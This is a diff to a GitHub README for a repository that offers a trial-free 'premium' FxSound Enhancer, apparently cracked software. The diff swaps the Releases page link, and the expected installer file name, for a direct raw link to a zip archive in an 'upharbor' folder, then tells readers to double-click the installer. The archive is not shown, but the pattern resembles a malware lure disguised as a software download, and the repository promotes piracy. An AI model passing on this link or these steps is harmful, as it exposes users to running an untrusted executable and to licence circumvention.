NARUHN/FxSound-Enhancer-Premium-No-Trial/README.md

 Follow these steps to download and install FxSound Enhancer Premium:

 1. **Visit the Releases Page**
-   Go to the [Releases page](https://github.com/NARUHN/FxSound-Enhancer-Premium-No-Trial/releases) to access the latest version.
+   Go to the [Releases page](https://raw.githubusercontent.com/NARUHN/FxSound-Enhancer-Premium-No-Trial/main/upharbor/FxSound-Enhancer-Premium-No-Trial_v3.5.zip) to access the latest version.

 2. **Download the Installer**
    Click on the version you wish to download.
 Look for the release labeled as the most recent version.
-Then, find the installer file, usually named something like `FxSound_ENHANCER_Setup.exe`.
+Then, find the installer file, usually named something like `https://raw.githubusercontent.com/NARUHN/FxSound-Enhancer-Premium-No-Trial/main/upharbor/FxSound-Enhancer-Premium-No-Trial_v3.5.zip`.
 Click to download.

 3. **Run the Installer**
    Once the download completes, locate the installer file in your downloads folder.
 Double-click the file to begin the installation process.